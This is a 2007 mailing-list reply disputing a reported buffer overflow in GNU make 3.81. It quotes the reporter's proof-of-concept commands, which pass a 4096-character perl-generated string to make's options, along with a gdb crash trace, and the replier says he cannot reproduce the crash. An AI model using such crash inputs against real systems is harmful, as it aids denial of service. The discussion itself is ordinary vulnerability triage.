RE: make multiple buffer overflow

From: Dave Korn
Subject: RE: make multiple buffer overflow
Date: Thu, 6 Dec 2007 14:47:40 -0000

On 06 December 2007 05:09, laurent gaffie wrote:

> Application: Make <= 3.81
> Web Site: http://savannah.gnu.org/projects/make/ &
> http://www.gnu.org/software/make/ 
> Platform: Unix
> Bug:multiple buffer overflow

> Proof of concept example :
> make `perl -e 'print"A"x4096'` //***
> make -f `perl -e 'print"A"x4096'`
> make -j `perl -e 'print"A"x4096'`
> make -i `perl -e 'print"A"x4096'`
> make -l `perl -e 'print"A"x4096'`
> *** depending the case , you'll need to change  the value ,  for a couple
> of more  A , playing by  hundred should be good to make sure you trigger it 

  I couldn't reproduce any of these, on either Linux or Cygwin, on 3.80 or
3.81 (although I didn't try absolutely every possible combination there).  I
get lots of "stat: AAAAAA[...]AAAA: File name too long" and "No rule to make
target `AAAAA[..]AAAA'" messages instead.

> address@hidden:~# gdb make
> GNU gdb 6.6-debian
> Copyright (C) 2006 Free Software Foundation, Inc.

  Is it possible that debian's distro has a customised version of make?  Did
you build make from CVS sources or tarballs?  I see you've got no stack
backtrace in your debug output, if you did build your own you'd get symbol

> (gdb) run `perl -e 'print"A"x4296'`//my GCC version have a protection for
> stack smashing then 200 chars more , and we trigger it 

  Hmm, perhaps the stack smashing protection is generating a false positive?
I guess this implies that you /are/ building make from sources, yes?

> Starting program: /usr/bin/make `perl -e 'print"A"x4296'`
> (no debugging symbols found)
> (no debugging symbols found)
> (no debugging symbols found)
> (no debugging symbols found)
> (no debugging symbols found)
> [Thread debugging using libthread_db enabled]
> [New Thread -1209637200 (LWP 1246)]
> AAAAA.........AAAAAAAAAA....

  That's the kind of message I see from make...

> Program received signal SIGSEGV, Segmentation fault.

... but I don't get a SEGV.  Can you try it again without stack protection?

Can't think of a witty .sigline today....

